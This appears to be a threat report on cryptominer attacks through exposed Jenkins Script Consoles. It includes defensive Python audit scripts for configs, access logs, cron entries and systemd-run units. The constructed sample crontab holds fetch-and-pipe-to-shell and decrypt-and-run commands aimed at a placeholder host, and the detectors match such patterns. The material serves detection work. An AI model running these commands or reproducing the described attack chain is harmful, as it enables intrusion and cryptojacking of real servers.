Researchers discovered attackers targeting misconfigured Jenkins Script Consoles to execute malicious Groovy scripts, in this case to deploy cryptocurrency miners. By abusing vulnerabilities and misconfigurations, such as improperly set authentication, attackers gain remote code execution on the controller, download miner binaries, and maintain persistence through cron jobs and systemd-run. Check your environment for the associated indicators of compromise; if any are found, remove the files immediately and redeploy the affected workloads from a known clean state.
The Jenkins Script Console allows administrators to execute Groovy scripts with the controller's full privileges. By default, the console is restricted to authenticated users with administrative rights. If it is misconfigured, for example through an improper authentication setup, attackers can reach the console and execute arbitrary scripts. A search on Shodan shows numerous publicly exposed Jenkins servers, each a potential target if not properly secured.
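Two checks a defender can run offline against the misconfiguration described above, written as an added example rather than code from the original report: the first parses the controller's `config.xml` for authorization settings that hand anonymous or self-registered users full control (the element and class names are the ones Jenkins writes to `config.xml`; verify them against your own controller's file), and the second scans NCSA-style access-log lines for POSTs to the Script Console endpoints `/script` and `/scriptText` and records who issued them. The log layout is assumed to be the common-log format; the config and log samples are constructed.

```python
"""Audit a Jenkins controller for an exposed Script Console (offline checks).

1. config_exposes_script_console(config_xml): parses config.xml and reports
   authorization settings that give unauthenticated or self-registered users
   full control, which is what exposes /script to anyone.
2. script_console_requests(log_lines): scans NCSA-style access-log lines for
   POSTs to the Script Console endpoints and records who issued them.

The config and log samples below are constructed for this example.
"""
import re
import xml.etree.ElementTree as ET

# Script Console endpoints: the HTML form (/script) and the plain-text API
# (/scriptText). Agent consoles live under /computer/<name>/script, so the
# check uses a suffix match.
SCRIPT_ENDPOINTS = ("/script", "/scriptText")

# Permission ids that allow running Groovy on the controller (RunScripts is
# the legacy id that was folded into Administer).
ADMIN_PERMS = ("hudson.model.Hudson.Administer", "hudson.model.Hudson.RunScripts")

# Assumed common-log layout: ip ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def config_exposes_script_console(config_xml: str) -> list:
    """Return a list of findings; an empty list means no anonymous full-control path."""
    root = ET.fromstring(config_xml)
    strategy = root.find("authorizationStrategy")
    realm = root.find("securityRealm")
    findings = []
    if strategy is None:
        return ["no <authorizationStrategy> element: security may be disabled"]
    cls = strategy.get("class", "")

    # "Anyone can do anything": every visitor is an administrator.
    if cls.endswith("AuthorizationStrategy$Unsecured"):
        findings.append("Unsecured strategy: anonymous users have full control")

    # Matrix strategy: look for admin permissions granted to the anonymous sid.
    # Entries read "permission:sid" (older) or "USER|GROUP:permission:sid" (newer).
    if cls.endswith("GlobalMatrixAuthorizationStrategy"):
        for perm in strategy.findall("permission"):
            parts = (perm.text or "").strip().split(":")
            if len(parts) >= 2 and parts[-1] == "anonymous" and parts[-2] in ADMIN_PERMS:
                findings.append(f"{parts[-2]} granted to anonymous")

    # "Logged-in users can do anything" is only as strong as account creation:
    # with self-signup enabled, anyone can register and become an administrator.
    if cls.endswith("FullControlOnceLoggedInAuthorizationStrategy") and realm is not None:
        signup_disabled = realm.findtext("disableSignup", default="true").strip().lower()
        if realm.get("class", "").endswith("HudsonPrivateSecurityRealm") and signup_disabled == "false":
            findings.append("FullControlOnceLoggedIn with self-signup enabled: anyone can register as admin")
    return findings


def script_console_requests(log_lines) -> list:
    """Return each POST to a Script Console endpoint as a dict for triage."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue  # GET /script only renders the form; POST executes the script
        path = m.group("path").split("?", 1)[0].rstrip("/")
        if not path.endswith(SCRIPT_ENDPOINTS):
            continue
        hits.append({
            "ip": m.group("ip"),
            "user": m.group("user"),
            "anonymous": m.group("user") == "-",  # no authenticated principal
            "path": path,
            "status": int(m.group("status")),
            "time": m.group("time"),
        })
    return hits


# Constructed weak config: Overall/Administer granted to anonymous.
SAMPLE_CONFIG_WEAK = """<hudson>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
  </securityRealm>
  <authorizationStrategy class="hudson.security.GlobalMatrixAuthorizationStrategy">
    <permission>hudson.model.Hudson.Administer:anonymous</permission>
    <permission>hudson.model.Hudson.Read:authenticated</permission>
  </authorizationStrategy>
</hudson>"""

# Constructed hardened config: only logged-in users have control, signup disabled.
SAMPLE_CONFIG_HARDENED = """<hudson>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
  </securityRealm>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
</hudson>"""

# Constructed access-log lines (198.51.100.0/24 is documentation address space).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jul/2024:03:12:45 +0000] "POST /scriptText HTTP/1.1" 200 418',
    '10.0.0.5 - alice [10/Jul/2024:09:01:02 +0000] "GET /script HTTP/1.1" 200 9120',
    '10.0.0.5 - alice [10/Jul/2024:09:01:30 +0000] "POST /script HTTP/1.1" 200 9350',
    '10.0.0.9 - ci-bot [10/Jul/2024:09:05:00 +0000] "POST /job/build/build HTTP/1.1" 201 0',
]

if __name__ == "__main__":
    for name, cfg in (("weak", SAMPLE_CONFIG_WEAK), ("hardened", SAMPLE_CONFIG_HARDENED)):
        print(name, config_exposes_script_console(cfg))
    for hit in script_console_requests(SAMPLE_LOG):
        print(hit)
```

Any hit with `anonymous` set is a Script Console execution without an authenticated principal and should be treated as a compromise until proven otherwise; authenticated hits still deserve a look, since a stolen admin credential produces the same log line with a real user name.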
An analysis revealed that attackers are using the Script Console to run scripts that download and execute a miner binary. The script checks for writable directories, frees CPU for the miner by terminating other high-CPU processes, and maintains persistence through cron jobs and systemd-run. It also downloads its payload in encrypted form and decrypts it on the host to evade detection, keeping the miner binary persistent and operational.
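The persistence described above leaves traces in two places a responder already collects: the crontab and the list of systemd units. The following is an added example, not code from the original analysis, that flags cron entries and systemd-run transient units matching that behaviour: commands that download content and pipe it to a shell, decode or decrypt a payload on the command line, run from world-writable scratch directories, or spawn transient units. The crontab and `systemctl list-units` samples are constructed (the URLs use the 192.0.2.0/24 documentation range), and the naming of transient units as `run-u<N>.service` / `run-r<hex>.service` is systemd-run's default.

```python
"""Triage cron and systemd-run persistence of the kind described above.

Input is text you already have (crontab -l output, /etc/cron.d files,
systemctl list-units output). All samples below are constructed.
"""
import re

WRITABLE_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(ba|da)?sh\b")
DECODE_RE = re.compile(r"base64\s+(-d|--decode)|openssl\s+enc\b.*-d\b")
CRON_MACRO_RE = re.compile(r"^@(reboot|yearly|annually|monthly|weekly|daily|hourly)\s+")
ENV_LINE_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def split_cron_line(line: str):
    """Return the command part of a crontab line, or None for comments,
    blank lines and environment assignments."""
    s = line.strip()
    if not s or s.startswith("#") or ENV_LINE_RE.match(s):
        return None
    m = CRON_MACRO_RE.match(s)
    if m:
        return s[m.end():]
    fields = s.split(None, 5)  # five time fields, then the command
    return fields[5] if len(fields) == 6 else None


def command_reasons(command: str) -> list:
    """Reasons a scheduled command looks like fetch-and-execute persistence."""
    reasons = []
    if DOWNLOADER_RE.search(command) and PIPE_TO_SHELL_RE.search(command):
        reasons.append("downloads content and pipes it to a shell")
    if DECODE_RE.search(command):
        reasons.append("decodes/decrypts a payload on the command line")
    if any(d in command for d in WRITABLE_DIRS):
        reasons.append("references a world-writable scratch directory")
    if "systemd-run" in command:
        reasons.append("spawns a transient systemd unit")
    return reasons


def suspicious_cron_entries(crontab_text: str) -> list:
    """Return flagged crontab entries with line number, command and reasons."""
    flagged = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        cmd = split_cron_line(line)
        if cmd is None:
            continue
        reasons = command_reasons(cmd)
        if reasons:
            flagged.append({"line": lineno, "command": cmd, "reasons": reasons})
    return flagged


def transient_units(systemctl_output: str) -> list:
    """Return systemd-run transient units (run-*.service) from list-units output,
    with the same reasons applied to the description (systemd-run uses the
    command line as the unit description by default)."""
    units = []
    for line in systemctl_output.splitlines():
        parts = line.replace("\u25cf", " ").split()  # drop the failed-unit bullet
        if len(parts) >= 5 and parts[0].startswith("run-") and parts[0].endswith(".service"):
            desc = " ".join(parts[4:])
            units.append({"unit": parts[0], "active": parts[2],
                          "description": desc, "reasons": command_reasons(desc)})
    return units


SAMPLE_CRONTAB = """# constructed sample of `crontab -l` output
SHELL=/bin/sh
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL http://192.0.2.10/d.sh | sh
@reboot /dev/shm/.cache/kworker -c /dev/shm/.cache/cfg
0 */6 * * * wget -qO- http://192.0.2.10/p.enc | openssl enc -d -aes-256-cbc -k x | sh
"""

SAMPLE_UNITS = """  UNIT                LOAD   ACTIVE SUB     DESCRIPTION
  cron.service        loaded active running Regular background program processing daemon
  run-u1234.service   loaded active running /tmp/.x/kworker
  ssh.service         loaded active running OpenBSD Secure Shell server
"""

if __name__ == "__main__":
    for entry in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(entry)
    for unit in transient_units(SAMPLE_UNITS):
        print(unit)
```

Run it over every user's crontab (`crontab -l -u <user>`), the files under `/etc/cron.d`, and `systemctl list-units --type=service --all`; a benign transient unit from an administrator's own `systemd-run` will show up too, so treat the reasons as triage hints rather than verdicts.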